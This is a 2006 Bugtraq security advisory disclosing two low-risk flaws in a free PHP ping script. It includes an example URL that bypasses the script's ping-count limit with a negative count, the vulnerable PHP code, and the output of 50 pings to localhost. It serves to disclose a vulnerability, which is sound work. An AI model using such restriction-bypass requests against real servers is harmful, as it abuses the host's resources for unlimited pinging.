[42482] in bugtraq
The WorldsEnd.NET - Free Ping Script, written in PHP (2 vulns)
daemon@ATHENA.MIT.EDU (cvh@kapda.ir)
Sat Jan 28 06:46:09 2006
Date: 23 Jan 2006 20:54:13 -0000
Message-ID: <20060123205413.27426.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: cvh@kapda.ir
To: bugtraq@securityfocus.com
[KAPDA::#23] - The WorldsEnd.NET - Free Ping Script, written in PHP (2 vulns)
KAPDA New advisory
Vulnerable products : The WorldsEnd.NET - Free Ping Script
Vendor: http://www.theworldsend.net/
Risk: Low
Vulnerabilities: Restriction Bypass
Date :
--------------------
Found : Aug 2005
Vendor Contacted : N/A
Release Date : Jan 2006
About The WorldsEnd.NET - Free Ping Script :
--------------------
A simple php script for sending pings to remote hosts.
This script has a bad reputation because of a previous remote command execution bug.
Vulnerability:
--------------------
Vuln 1: the script allows to ping the server it is hosted on. 127.0.0.1
Vuln 2: the scripts only allows you to send 10 or 4 pings
Just look at the count value in the url
http://victim/ping.php?host=127.0.0.1&coun...&submit=Ping%21
Maximum for count is: 10
But because of a signed/unsigned integer overflow (script -> ping) and an extra programming error we can bypass that restriction.
Exploit:
--------------------
You can bypass the ping count restriction by just making the count value negative.
http://victim/ping.php?host=127.0.0.1&coun...&submit=Ping%21
This will bypass the restriction and allows you to send any amount of pings.
Just look at this code snippet from the script
// over count ?
If ($count > $max_count) <== HERE IS THE MISTAKE, IT DOENS'NT CHECK FOR NEGATIVE NUMBERS
{
echo 'Maximum for count is: '.$max_count;
echo '<a href="'.$self.'">Back</a>';
}
else
{
// replace bad chars
$host= preg_replace ("/[^A-Za-z0-9.]/","",$host); <== HERE IS THE FIX FOR THE REMOTE CODE EXECUTION BUG
echo '<body bgcolor="#FFFFFF" text="#000000"></body>';
echo("Ping Output:<br>");
echo '<pre>';
Ping Output:
Pinging 127.0.0.1 with 32 bytes of data:
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Ping statistics for 127.0.0.1:
Packets: Sent = 50, Received = 50, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
Solution:
--------------------
No patch or fix exits
Original Advisory:
--------------------
http://www.kapda.ir/advisory-231.html
Credit :
--------------------
Discoverd by cvh [at} kapda.ir
Grtz to all members of KAPDA and GSO.
KAPDA - Computer Security Researchers Institute
http://www.KAPDA.ir